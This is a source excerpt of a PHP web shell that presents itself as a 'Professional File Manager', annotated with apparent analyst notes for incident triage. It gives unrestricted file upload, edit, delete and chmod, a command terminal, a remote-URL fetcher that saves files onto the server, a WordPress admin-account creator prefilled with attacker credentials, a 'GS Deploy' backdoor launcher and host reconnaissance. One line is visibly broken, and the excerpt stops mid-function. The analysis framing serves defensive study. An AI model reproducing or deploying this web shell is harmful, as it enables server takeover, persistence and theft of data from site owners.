// Status text set by the file operations below.
$message = '';

// 1. Download
// Streams one file from the selected directory as an attachment. basename() restricts the name to a single path
// component; the directory is the unrestricted $base_dir. Relevant when scoping which data left the host.
if ($action === 'download' && isset($_GET['file'])) {
    $file = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['file']);
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// 2. Remove
// Deletes one entry in the selected directory. This is a state-changing action reachable through a GET request.
// rmdir() only succeeds on empty directories; everything else goes to unlink().
if ($action === 'remove' && isset($_GET['item'])) {
    $item = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['item']);
    if (is_dir($item)) {
        rmdir($item) ? $message = "Directory removed." : $message = "Error removing directory.";
    }
    else {
        unlink($item) ? $message = "File removed." : $message = "Error removing file.";
    }
}

// 3. Upload
// Multi-file upload into the selected directory under the client-supplied names, with no extension or content
// checks. $message records success if at least one file moved; failures are not reported.
if ($action === 'upload' && !empty($_FILES['files'])) {
    foreach ($_FILES['files']['name'] as $i => $name) {
        if (move_uploaded_file($_FILES['files']['tmp_name'][$i], $base_dir . DIRECTORY_SEPARATOR . $name)) {
            $message = "Files uploaded successfully.";
        }
    }
}

// 4. Save Content (Edit)
// Overwrites (or creates) a file in the selected directory with POSTed content. This is the path by which
// existing site files can be modified in place; compare mtimes and hashes of application files against a known-good copy.
if ($action === 'save' && isset($_POST['file']) && isset($_POST['content'])) {
    $file = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['file']);
    file_put_contents($file, $_POST['content']) !== false ? $message = "File saved." : $message = "Error saving file.";
}

// 5. Chmod
// Changes permissions on one entry; the POSTed mode is read as an octal string and is not range-checked.
if ($action === 'chmod' && isset($_POST['item']) && isset($_POST['mode'])) {
    $item = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['item']);
    chmod($item, octdec($_POST['mode'])) ? $message = "Permissions updated." : $message = "Error updating permissions.";
}

// 6. Rename
// Renames one entry within the selected directory. Both names pass through basename(), so the entry stays in
// the same directory, but its extension can be changed freely.
if ($action === 'rename' && isset($_POST['old']) && isset($_POST['new'])) {
    $old = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['old']);
    $new = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['new']);
    rename($old, $new) ? $message = "Renamed successfully." : $message = "Error renaming.";
}

// Helper: Scan Directory
/**
 * Lists a directory for the file-manager table.
 *
 * Each entry carries name, is_dir flag, human-readable size ('-' for directories), the last four octal digits of
 * the permission bits, and the modification time. Directories sort first, then names case-insensitively.
 *
 * @param string $dir directory to list
 * @return array list of entry arrays with keys name, is_dir, size, perms, date
 */
function get_dir_contents($dir)
{
    $items = [];
    $raw = scandir($dir);
    foreach ($raw as $name) {
        // NOTE(review): the right-hand operand of this comparison is missing in the decoder output, so the line
        // does not parse as shown; the original value cannot be recovered from this page.
        if ($name === )
            continue;
        $path = $dir . DIRECTORY_SEPARATOR . $name;
        $items[] = [
            'name' => $name,
            'is_dir' => is_dir($path),
            'size' => is_dir($path) ? '-' : format_bytes(filesize($path)),
            'perms' => substr(sprintf('%o', fileperms($path)), -4),
            'date' => date("Y-m-d H:i", filemtime($path))
        ];
    }
    // Directories before files; ties broken by case-insensitive name.
    usort($items, function ($a, $b) {
        if ($a['is_dir'] && !$b['is_dir'])
            return -1;
        if (!$a['is_dir'] && $b['is_dir'])
            return 1;
        return strcasecmp($a['name'], $b['name']);
    });
    return $items;
}

/**
 * Formats a byte count with a binary-scaled unit suffix (B, KB, MB, GB, TB).
 *
 * Negative counts are clamped to zero and values beyond the TB range stay expressed in TB.
 *
 * @param int|float $bytes     size in bytes
 * @param int       $precision decimal places passed to round()
 * @return string rounded value, a space, and the unit
 */
function format_bytes($bytes, $precision = 2)
{
    $suffixes = ['B', 'KB', 'MB', 'GB', 'TB'];
    $size = max($bytes, 0);
    // log() is skipped for zero so the exponent falls back to 0.
    $magnitude = $size ? log($size) : 0;
    $exponent = min(floor($magnitude / log(1024)), count($suffixes) - 1);
    $scaled = $size / pow(1024, $exponent);

    return round($scaled, $precision) . ' ' . $suffixes[$exponent];
}

$items = get_dir_contents($base_dir);
echo '<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Professional File Manager</title>
    <style>
        :root {
            --main-bg: #0b0b0b;
            --side-bg: #111111;
            --card-bg: #161616;
            --accent: #00f0ff;
            --text: #f0f0f0;
            --dim: #888;
            --border: #333;
            --hover: #1a1a1a;
            --danger: #ff4444;
            --success: #00ff88;
        }

        body {
            font-family: \'Inter\', system-ui, sans-serif;
            background: var(--main-bg);
            color: var(--text);
            margin: 0;
            display: flex;
            height: 100vh;
            overflow: hidden;
        }

        aside {
            width: 260px;
            background: var(--side-bg);
            border-right: 1px solid var(--border);
            display: flex;
            flex-direction: column;
            padding: 1.5rem;
            flex-shrink: 0;
        }

        .logo {
            font-size: 1.1rem;
            font-weight: 800;
            color: var(--accent);
            margin-bottom: 2rem;
            display: flex;
            align-items: center;
            gap: 10px;
        }

        nav#sidebar {
            display: flex;
            flex-direction: column;
            gap: 5px;
        }

        .nav-item {
            padding: 10px 12px;
            border-radius: 6px;
            cursor: pointer;
            font-size: 0.9rem;
            color: var(--dim);
            transition: 0.2s;
        }

        .nav-item:hover {
            background: var(--hover);
            color: var(--text);
        }

        .nav-item.active {
            background: rgba(0, 240, 255, 0.1);
            color: var(--accent);
            font-weight: 600;
        }

        main {
            flex: 1;
            overflow-y: auto;
            padding: 2rem;
        }

        header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 2rem;
        }

        .breadcrumb {
            display: flex;
            gap: 8px;
            color: var(--dim);
            font-size: 0.9rem;
            margin-bottom: 1rem;
            overflow-x: auto;
            white-space: nowrap;
        }

        .breadcrumb a {
            color: var(--accent);
            text-decoration: none;
        }

        .breadcrumb span {
            color: var(--border);
        }

        .btn {
            background: #222;
            color: #fff;
            border: 1px solid var(--border);
            padding: 8px 16px;
            border-radius: 6px;
            cursor: pointer;
            text-decoration: none;
            font-size: 0.85rem;
            display: inline-flex;
            align-items: center;
            gap: 6px;
        }

        .btn:hover {
            background: var(--hover);
            border-color: var(--accent);
        }

        .btn-accent {
            background: var(--accent);
            color: #000;
            border: none;
            font-weight: 600;
        }

        table {
            width: 100%;
            border-collapse: collapse;
            font-size: 0.9rem;
            background: var(--card-bg);
            border-radius: 8px;
            overflow: hidden;
        }

        th {
            text-align: left;
            padding: 12px 16px;
            background: #222;
            color: var(--dim);
            font-weight: 500;
            font-size: 0.75rem;
            text-transform: uppercase;
            letter-spacing: 0.05em;
        }

        td {
            padding: 12px 16px;
            border-bottom: 1px solid var(--border);
            vertical-align: middle;
        }

        tr:hover td {
            background: var(--hover);
        }

        .item-name {
            display: flex;
            align-items: center;
            gap: 12px;
            color: var(--text);
            text-decoration: none;
        }

        .item-name:hover {
            color: var(--accent);
        }

        .icon {
            width: 18px;
            height: 18px;
            fill: var(--dim);
        }

        .dir-icon {
            fill: var(--accent);
        }

        .actions {
            display: flex;
            gap: 10px;
            justify-content: flex-end;
            opacity: 0.4;
            transition: 0.2s;
        }

        tr:hover .actions {
            opacity: 1;
        }

        .action-link {
            color: var(--dim);
            text-decoration: none;
            font-size: 0.8rem;
        }

        .action-link:hover {
            color: var(--accent);
        }

        .modal {
            display: none;
            position: fixed;
            inset: 0;
            background: rgba(0, 0, 0, 0.8);
            align-items: center;
            justify-content: center;
            z-index: 100;
        }

        .modal-content {
            background: var(--card-bg);
            border: 1px solid var(--border);
            border-radius: 12px;
            padding: 2rem;
            width: 90%;
            max-width: 600px;
        }

        .modal-content.modal-edit {
            max-width: 900px;
            height: 80vh;
            display: flex;
            flex-direction: column;
        }

        .modal-content.modal-edit form {
            display: flex;
            flex-direction: column;
            flex: 1;
        }

        .modal-content.modal-edit textarea {
            flex: 1;
            height: auto;
            min-height: 300px;
        }

        .modal h2 {
            margin-top: 0;
            font-size: 1.25rem;
            color: var(--accent);
        }

        textarea {
            width: 100%;
            height: 300px;
            background: #000;
            border: 1px solid var(--border);
            color: #ccc;
            border-radius: 6px;
            padding: 1rem;
            font-family: monospace;
            font-size: 0.9rem;
            resize: vertical;
            margin: 1rem 0;
        }

        input[type="text"] {
            width: 100%;
            background: #000;
            border: 1px solid var(--border);
            color: #fff;
            padding: 10px;
            border-radius: 6px;
            margin: 0.5rem 0;
        }

        .msg {
            background: rgba(0, 240, 255, 0.1);
            color: var(--accent);
            padding: 10px 16px;
            border-radius: 6px;
            margin-bottom: 1.5rem;
            font-size: 0.85rem;
            border: 1px solid rgba(0, 240, 255, 0.2);
        }

        .terminal-output {
            background: #000;
            border: 1px solid var(--border);
            color: #cfcfcf;
            border-radius: 6px;
            padding: 1rem;
            font-family: monospace;
            font-size: 0.85rem;
            height: 260px;
            overflow: auto;
            white-space: pre-wrap;
        }

        .terminal-input {
            width: 100%;
            background: #000;
            border: 1px solid var(--border);
            color: #fff;
            padding: 10px;
            border-radius: 6px;
            margin-top: 0.75rem;
            font-family: monospace;
            font-size: 0.9rem;
        }
    </style>
</head>

<body>

    <aside>
        <div class="logo">
            <svg viewBox="0 0 24 24" class="icon dir-icon">
                <path d="M10 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V8c0-1.1-.9-2-2-2h-8l-2-2z" />
            </svg>
            FILE MANAGER
        </div>

        <nav id="sidebar">
            <div style="font-size: 0.65rem; color: #444; margin-bottom: 8px; font-weight: 800; letter-spacing: 0.1em;">
                NAVIGATION</div>
            <div class="nav-item active" onclick="location.href=\'?path=';echo urlencode($encoded_base_dir); echo '\'">Explorer
            </div>

            <div style="font-size: 0.65rem; color: #444; margin: 16px 0 8px; font-weight: 800; letter-spacing: 0.1em;">
                TOOLS</div>
            <div class="nav-item" onclick="openFinder()">Webshell Finder</div>
            <div class="nav-item" onclick="openSQLModal()">SQL Manager</div>
            <div class="nav-item" onclick="openTerminal()">Terminal</div>
            <div class="nav-item" onclick="openRemoteUpload()">Remote Upload</div>
            <div class="nav-item" onclick="openWpAdminCreator()">WP Admin Creator</div>
            <div class="nav-item" onclick="openGsDeploy()">GS Deploy</div>
            <div class="nav-item" onclick="openServerInfo()">Server Information</div>
        </nav>

        <div style="margin-top: auto;">
            <form id="upload-form" method="POST" enctype="multipart/form-data"
                action="?action=upload&path=';echo urlencode($encoded_base_dir); echo '">
                <input type="file" name="files[]" id="file-input" multiple style="display:none"
                    onchange="document.getElementById(\'upload-form\').submit()">
                <button type="button" class="btn btn-accent" style="width:100%"
                    onclick="document.getElementById(\'file-input\').click()">Upload Files</button>
            </form>
        </div>
    </aside>

    <main>
        <header>
            <div>
                <h1 style="margin:0; font-size: 1.4rem;">Explorer</h1>
                <div class="breadcrumb">
                    ';$parts = explode(DIRECTORY_SEPARATOR, trim($base_dir, DIRECTORY_SEPARATOR));
// Breadcrumb trail: emits a root link, then one link per component of
// $base_dir, each pointing at ?path=<encode_path(prefix so far)>.
// encode_path() and $encoded_root are defined outside this excerpt.
$current = '';
echo '<a href="?path=' . urlencode($encoded_root) . '">/</a>';
foreach ($parts as $part) {
    // The trim() on $base_dir only strips the outer separators, so doubled
    // separators inside the path still produce empty components; skip them.
    // empty() also skips a component literally named "0".
    if (empty($part))
        continue;
    $current .= DIRECTORY_SEPARATOR . $part;
    // NOTE(review): $part is written into the page without htmlspecialchars(),
    // so a directory name containing markup is rendered as HTML in the browser
    // of whoever opens this panel, analysts included. Open samples like this
    // only in an isolated environment.
    echo '<span>/</span> <a href="?path=' . urlencode(encode_path($current)) . '">' . $part . '</a>';
}
echo '                </div>
            </div>
        </header>

        ';if ($message): echo '        <div class="msg">
            ';echo $message; echo '        </div>
        ';endif; echo '
        <table>
            <thead>
                <tr>
                    <th>Name</th>
                    <th>Size</th>
                    <th>Perms</th>
                    <th>Updated</th>
                    <th style="text-align: right;">Actions</th>
                </tr>
            </thead>
            <tbody>
                ';if ($base_dir !== DIRECTORY_SEPARATOR && $base_dir !== '/'): echo '                <tr>
                    <td colspan="5">
                        <a href="?path=';echo urlencode(encode_path(dirname($base_dir))); echo '" class="item-name">
                            <svg viewBox="0 0 24 24" class="icon">
                                <path d="M10 9V5l-7 7 7 7v-4.1c5 0 8.5 1.6 11 5.1-1-5-4-10-11-11z" />
                            </svg>
                            ..
                        </a>
                    </td>
                </tr>
                ';endif; echo '
                ';foreach ($items as $item): echo '                <tr>
                    <td>
                        <a href="';echo $item['is_dir'] ? '?path=' . urlencode(encode_path($base_dir . DIRECTORY_SEPARATOR . $item['name'])) : '#'; echo '"
                            class="item-name" ';if (!$item['is_dir'])
        echo 'onclick="editFile(\'' . urlencode($item['name']) . '\')"'; echo '>
                            ';if ($item['is_dir']): echo '                            <svg viewBox="0 0 24 24" class="icon dir-icon">
                                <path
                                    d="M10 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V8c0-1.1-.9-2-2-2h-8l-2-2z" />
                            </svg>
                            ';    else: echo '                            <svg viewBox="0 0 24 24" class="icon">
                                <path
                                    d="M13 2H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2V9l-7-7zM6 20V4h6v5h5v11H6z" />
                            </svg>
                            ';    endif; echo '                            ';echo $item['name']; echo '                        </a>
                    </td>
                    <td><span style="color: var(--dim)">
                            ';echo $item['size']; echo '                        </span></td>
                    <td><span style="font-family: monospace">
                            ';echo $item['perms']; echo '                        </span></td>
                    <td><span style="color: var(--dim); font-size: 0.8rem">
                            ';echo $item['date']; echo '                        </span></td>
                    <td class="actions">
                        <a href="?action=download&path=';echo urlencode($encoded_base_dir); echo '&file=';echo urlencode($item['name']); echo '"
                            class="action-link">Get</a>
                        <a href="javascript:void(0)" onclick="renameItem(\'';echo urlencode($item['name']); echo '\')"
                            class="action-link">Ren</a>
                        <a href="javascript:void(0)"
                            onclick="chmodItem(\'';echo urlencode($item['name']); echo '\', \'';echo $item['perms']; echo '\')"
                            class="action-link">Mod</a>
                        <a href="?action=remove&path=';echo urlencode($encoded_base_dir); echo '&item=';echo urlencode($item['name']); echo '"
                            class="action-link" style="color: var(--danger)"
                            onclick="return confirm(\'Confirm delete?\')">Del</a>
                    </td>
                </tr>
                ';endforeach; echo '            </tbody>
        </table>
    </main>

    
    <div id="modal-edit" class="modal">
        <div class="modal-content modal-edit">
            <h2 id="edit-filename">Edit File</h2>
            <form method="POST" action="?action=save&path=';echo urlencode($encoded_base_dir); echo '">
                <input type="hidden" name="file" id="edit-file-input">
                <textarea name="content" id="edit-content"></textarea>
                <div style="display: flex; gap: 10px; justify-content: flex-end;">
                    <button type="button" class="btn" onclick="closeModal(\'modal-edit\')">Cancel</button>
                    <button type="submit" class="btn btn-accent">Save Changes</button>
                </div>
            </form>
        </div>
    </div>

    <div id="modal-rename" class="modal">
        <div class="modal-content" style="max-width: 400px;">
            <h2>Rename Item</h2>
            <form method="POST" action="?action=rename&path=';echo urlencode($encoded_base_dir); echo '">
                <input type="hidden" name="old" id="rename-old">
                <input type="text" name="new" id="rename-new" placeholder="New name">
                <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
                    <button type="button" class="btn" onclick="closeModal(\'modal-rename\')">Cancel</button>
                    <button type="submit" class="btn btn-accent">Rename</button>
                </div>
            </form>
        </div>
    </div>

    <div id="modal-chmod" class="modal">
        <div class="modal-content" style="max-width: 400px;">
            <h2>Change Permissions</h2>
            <form method="POST" action="?action=chmod&path=';echo urlencode($encoded_base_dir); echo '">
                <input type="hidden" name="item" id="chmod-item">
                <input type="text" name="mode" id="chmod-mode" placeholder="Mode (e.g. 0644)">
                <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
                    <button type="button" class="btn" onclick="closeModal(\'modal-chmod\')">Cancel</button>
                    <button type="submit" class="btn btn-accent">Update</button>
                </div>
            </form>
        </div>
    </div>

    <div id="modal-finder" class="modal">
        <div class="modal-content" style="max-width: 800px;">
            <div style="display: flex; justify-content: space-between; align-items: center;">
                <h2>Webshell Finder</h2>
                <div id="scan-status" style="font-size: 0.8rem; color: var(--accent);">Idle</div>
            </div>

            <div style="margin-bottom: 1rem;">
                <label style="font-size: 0.75rem; color: var(--dim); display: block; margin-bottom: 4px;">SCAN TARGET
                    DIRECTORY</label>
                <input type="text" id="scan-path-input" value="';echo htmlspecialchars($base_dir); echo '"
                    placeholder="Full path to scan...">
            </div>

            <div id="finder-results"
                style="max-height: 400px; overflow-y: auto; border: 1px solid var(--border); border-radius: 8px;">
                <table style="margin: 0;">
                    <thead style="position: sticky; top: 0; z-index: 10;">
                        <tr>
                            <th>File Location</th>
                            <th>Detected Patterns</th>
                            <th style="width: 80px;">Action</th>
                        </tr>
                    </thead>
                    <tbody id="finder-tbody">
                        <tr>
                            <td colspan="3" style="text-align: center; padding: 40px; color: var(--dim);">Click scan to
                                begin.</td>
                        </tr>
                    </tbody>
                </table>
            </div>

            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-finder\')">Close</button>
                <button type="button" id="btn-start-scan" class="btn btn-accent" onclick="runScan()">Start
                    Analysis</button>
            </div>
        </div>
    </div>

    <div id="modal-sql" class="modal">
        <div class="modal-content" style="max-width: 450px;">
            <h2>SQL Manager (Adminer)</h2>
            <p style="color: var(--dim); font-size: 0.85rem;">Adminer is a full-featured tool for managing databases.
                You can install it as a single file in the current directory.</p>

            <div id="sql-status-box"
                style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
                <span id="sql-install-text" style="font-size: 0.9rem;">Installing...</span>
            </div>

            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-sql\')">Close</button>
                <button type="button" id="btn-install-sql" class="btn btn-accent" onclick="installSQL()">Install
                    Adminer</button>
            </div>
        </div>
    </div>

    <div id="modal-terminal" class="modal">
        <div class="modal-content" style="max-width: 800px;">
            <div style="display: flex; justify-content: space-between; align-items: center;">
                <h2>Terminal</h2>
                <div id="terminal-status" style="font-size: 0.8rem; color: var(--accent);">Idle</div>
            </div>
            <div class="terminal-output" id="terminal-output">Ready.</div>
            <div id="terminal-caps" style="margin-top: 0.5rem; color: var(--dim); font-size: 0.75rem;">Checking capabilities...</div>
            <label style="display: inline-flex; align-items: center; gap: 6px; margin-top: 0.5rem; font-size: 0.8rem; color: var(--dim);">
                <input type="checkbox" id="terminal-test-all"> Test all methods
            </label>
            <input class="terminal-input" type="text" id="terminal-command" placeholder="Enter a command (runs in current directory)">
            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-terminal\')">Close</button>
                <button type="button" class="btn btn-accent" onclick="runTerminalCommand()">Run</button>
            </div>
        </div>
    </div>

    <div id="modal-remote-upload" class="modal">
        <div class="modal-content" style="max-width: 520px;">
            <h2>Remote Upload</h2>
            <p style="color: var(--dim); font-size: 0.85rem;">Fetch a file from a URL and save it into the current
                directory.</p>

            <input type="text" id="remote-url" placeholder="https://example.com/file.zip">
            <input type="text" id="remote-name" placeholder="Custom filename (optional)">

            <div id="remote-status-box"
                style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
                <span id="remote-status-text" style="font-size: 0.9rem;">Starting...</span>
            </div>

            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-remote-upload\')">Close</button>
                <button type="button" id="btn-remote-upload" class="btn btn-accent"
                    onclick="runRemoteUpload()">Fetch File</button>
            </div>
        </div>
    </div>

    <div id="modal-wp-admin" class="modal">
        <div class="modal-content" style="max-width: 520px;">
            <h2>WordPress Admin Creator</h2>
            <p style="color: var(--dim); font-size: 0.85rem;">Select a <code>wp-config.php</code> path and create a new
                admin user.</p>

            <input type="text" id="wp-config-path"
                placeholder="';echo htmlspecialchars($base_dir . DIRECTORY_SEPARATOR . 'wp-config.php'); echo '">
            <input type="text" id="wp-user" value="mrz" placeholder="Username">
            <input type="text" id="wp-pass" value="admin" placeholder="Password">
            <input type="text" id="wp-email" value="admin@bypass.pw" placeholder="Email">

            <div id="wp-status-box"
                style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
                <span id="wp-status-text" style="font-size: 0.9rem;">Starting...</span>
            </div>

            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-wp-admin\')">Close</button>
                <button type="button" id="btn-wp-detect" class="btn" onclick="detectWpConfig()">Auto Detect</button>
                <button type="button" id="btn-wp-create" class="btn btn-accent"
                    onclick="runWpAdminCreator()">Create Admin</button>
            </div>
        </div>
    </div>

    <div id="modal-gs-deploy" class="modal">
        <div class="modal-content" style="max-width: 520px;">
            <h2>GS Deploy</h2>
            <p style="color: var(--dim); font-size: 0.85rem;"><code>Deploy And Show Key</code>.</p>

            <div id="gs-status-box"
                style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
                <span id="gs-status-text" style="font-size: 0.9rem;">Ready.</span>
            </div>

            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-gs-deploy\')">Close</button>
                <button type="button" id="btn-gs-run" class="btn btn-accent" onclick="runGsDeploy()">Deploy</button>
            </div>
        </div>
    </div>

    <div id="modal-server-info" class="modal">
        <div class="modal-content" style="max-width: 700px;">
            <h2>Server Information</h2>
            <div id="server-info-box"
                style="margin-top: 0.5rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); font-family: monospace; font-size: 0.85rem; color: #cfcfcf; white-space: pre-wrap; min-height: 160px;">
                Loading...
            </div>
            <div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
                <button type="button" class="btn" onclick="closeModal(\'modal-server-info\')">Close</button>
                <button type="button" class="btn btn-accent" onclick="loadServerInfo()">Refresh</button>
            </div>
        </div>
    </div>

    <script>
        // Hides the modal overlay with the given element id by setting its display to none.
        function closeModal(id) { document.getElementById(id).style.display = \'none\'; }

        // Shows the SQL Manager dialog (#modal-sql). Nothing is installed until
        // installSQL() is invoked from that dialog.
        function openSQLModal() {
            document.getElementById(\'modal-sql\').style.display = \'flex\';
        }

        // Calls ?action=install_sql on this same script and shows the JSON result
        // (data.success / data.error) in the dialog. Per the status strings below,
        // the server side is expected to download Adminer and write it as
        // adminer.php; that handler is outside this excerpt.
        // Analyst note: requests carrying action=install_sql, or an adminer.php
        // that nobody deployed, are indicators worth checking during triage.
        async function installSQL() {
            const statusBox = document.getElementById(\'sql-status-box\');
            const statusText = document.getElementById(\'sql-install-text\');
            const installBtn = document.getElementById(\'btn-install-sql\');

            statusBox.style.display = \'block\';
            statusText.innerText = \'Downloading Adminer from GitHub...\';
            statusText.style.color = \'var(--text)\';
            installBtn.disabled = true;

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=install_sql&path=';echo urlencode($encoded_base_dir); echo '\');
                const data = await response.json();

                if (data.success) {
                    statusText.innerText = \'Adminer successfully installed as adminer.php\';
                    statusText.style.color = \'var(--success)\';
                    // The install button is repurposed as a page reload once done.
                    installBtn.innerText = \'Reload Explorer\';
                    installBtn.disabled = false;
                    installBtn.onclick = () => location.reload();
                } else {
                    statusText.innerText = data.error || \'Installation failed.\';
                    statusText.style.color = \'var(--danger)\';
                    installBtn.disabled = false;
                }
            } catch (e) {
                // Network failure or a non-JSON response ends up here.
                statusText.innerText = \'Error: \' + e.message;
                statusText.style.color = \'var(--danger)\';
                installBtn.disabled = false;
            }
        }

        // Shows the Webshell Finder dialog (#modal-finder). The scan is started
        // separately by runScan(), which is not part of this excerpt.
        function openFinder() {
            document.getElementById(\'modal-finder\').style.display = \'flex\';
        }

        // Shows the Terminal dialog (#modal-terminal) and focuses the command field.
        function openTerminal() {
            document.getElementById(\'modal-terminal\').style.display = \'flex\';
            document.getElementById(\'terminal-command\').focus();
        }

        // Shows the Remote Upload dialog (#modal-remote-upload) and focuses the URL field.
        function openRemoteUpload() {
            document.getElementById(\'modal-remote-upload\').style.display = \'flex\';
            document.getElementById(\'remote-url\').focus();
        }

        // Shows the WordPress Admin Creator dialog (#modal-wp-admin) and focuses
        // the wp-config.php path field.
        function openWpAdminCreator() {
            document.getElementById(\'modal-wp-admin\').style.display = \'flex\';
            document.getElementById(\'wp-config-path\').focus();
        }

        // Shows the GS Deploy dialog (#modal-gs-deploy). No request is sent until
        // runGsDeploy() is invoked from that dialog.
        function openGsDeploy() {
            document.getElementById(\'modal-gs-deploy\').style.display = \'flex\';
        }

        // Shows the Server Information dialog and immediately requests the data,
        // so merely opening the dialog produces an action=server_info request.
        function openServerInfo() {
            document.getElementById(\'modal-server-info\').style.display = \'flex\';
            loadServerInfo();
        }

        // Requests ?action=server_info on this same script and prints the returned
        // JSON fields (php_version, uname, current_user, disabled_functions,
        // server_ip, client_ip) as plain text. The handler that collects them is
        // outside this excerpt.
        // Analyst note: this is host reconnaissance output; action=server_info in
        // access logs marks the point where the operator profiled the server.
        async function loadServerInfo() {
            const box = document.getElementById(\'server-info-box\');
            box.textContent = \'Loading...\';

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=server_info&path=';echo urlencode($encoded_base_dir); echo '\');
                const data = await response.json();
                // Missing fields are shown as empty strings rather than undefined.
                const lines = [
                    `PHP Version: ${data.php_version || \'\'}`,
                    `Uname: ${data.uname || \'\'}`,
                    `Current User: ${data.current_user || \'\'}`,
                    `Disabled Functions: ${data.disabled_functions || \'\'}`,
                    `Server IP: ${data.server_ip || \'\'}`,
                    `Your IP: ${data.client_ip || \'\'}`
                ];
                // textContent is used, so the returned values are not parsed as HTML.
                box.textContent = lines.join(\'\\n\');
            } catch (e) {
                box.textContent = \'Error: \' + e.message;
            }
        }

        // POSTs the url and name form values to ?action=remote_upload on this same
        // script and reports the JSON result (data.file and data.method on success,
        // data.error otherwise). Per the dialog text the server side fetches the URL
        // and saves the file into the current directory; that handler is outside
        // this excerpt.
        // Analyst note: the web server itself makes the outbound request, so egress
        // filtering and file-integrity monitoring of web directories are the
        // controls that surface this; look for POSTs with action=remote_upload.
        async function runRemoteUpload() {
            const urlInput = document.getElementById(\'remote-url\');
            const nameInput = document.getElementById(\'remote-name\');
            const statusBox = document.getElementById(\'remote-status-box\');
            const statusText = document.getElementById(\'remote-status-text\');
            const btn = document.getElementById(\'btn-remote-upload\');
            const url = urlInput.value.trim();
            const name = nameInput.value.trim();

            // The URL is mandatory; the filename may be left empty.
            if (!url) {
                statusBox.style.display = \'block\';
                statusText.textContent = \'Please provide a URL.\';
                statusText.style.color = \'var(--danger)\';
                return;
            }

            statusBox.style.display = \'block\';
            statusText.textContent = \'Downloading...\';
            statusText.style.color = \'var(--text)\';
            btn.disabled = true;

            const body = new URLSearchParams();
            body.append(\'url\', url);
            body.append(\'name\', name);

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=remote_upload&path=';echo urlencode($encoded_base_dir); echo '\', {
                    method: \'POST\',
                    headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
                    body: body.toString()
                });
                const data = await response.json();
                if (data.success) {
                    statusText.textContent = `Saved as ${data.file} (${data.method})`;
                    statusText.style.color = \'var(--success)\';
                } else {
                    statusText.textContent = data.error || \'Remote upload failed.\';
                    statusText.style.color = \'var(--danger)\';
                }
            } catch (e) {
                statusText.textContent = \'Error: \' + e.message;
                statusText.style.color = \'var(--danger)\';
            } finally {
                // Re-enable the button whether the request succeeded or not.
                btn.disabled = false;
            }
        }

        // Requests ?action=gs_deploy on this same script and shows data.output and,
        // when present, data.method from the JSON reply. What gets deployed is
        // decided entirely by the server-side handler, which is outside this
        // excerpt; the dialog only describes it as Deploy And Show Key.
        // Analyst note: treat any action=gs_deploy request in access logs as a sign
        // that further tooling may have been placed on the host, and review process
        // and file-system changes around that timestamp.
        async function runGsDeploy() {
            const statusBox = document.getElementById(\'gs-status-box\');
            const statusText = document.getElementById(\'gs-status-text\');
            const btn = document.getElementById(\'btn-gs-run\');

            statusBox.style.display = \'block\';
            statusText.textContent = \'Running...\';
            statusText.style.color = \'var(--text)\';
            btn.disabled = true;

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=gs_deploy&path=';echo urlencode($encoded_base_dir); echo '\');
                const data = await response.json();
                if (data.success) {
                    const method = data.method ? ` (${data.method})` : \'\';
                    statusText.textContent = `Result: ${data.output || \'(no output)\'}${method}`;
                    statusText.style.color = \'var(--success)\';
                } else {
                    statusText.textContent = data.error || \'GS Deploy failed.\';
                    statusText.style.color = \'var(--danger)\';
                }
            } catch (e) {
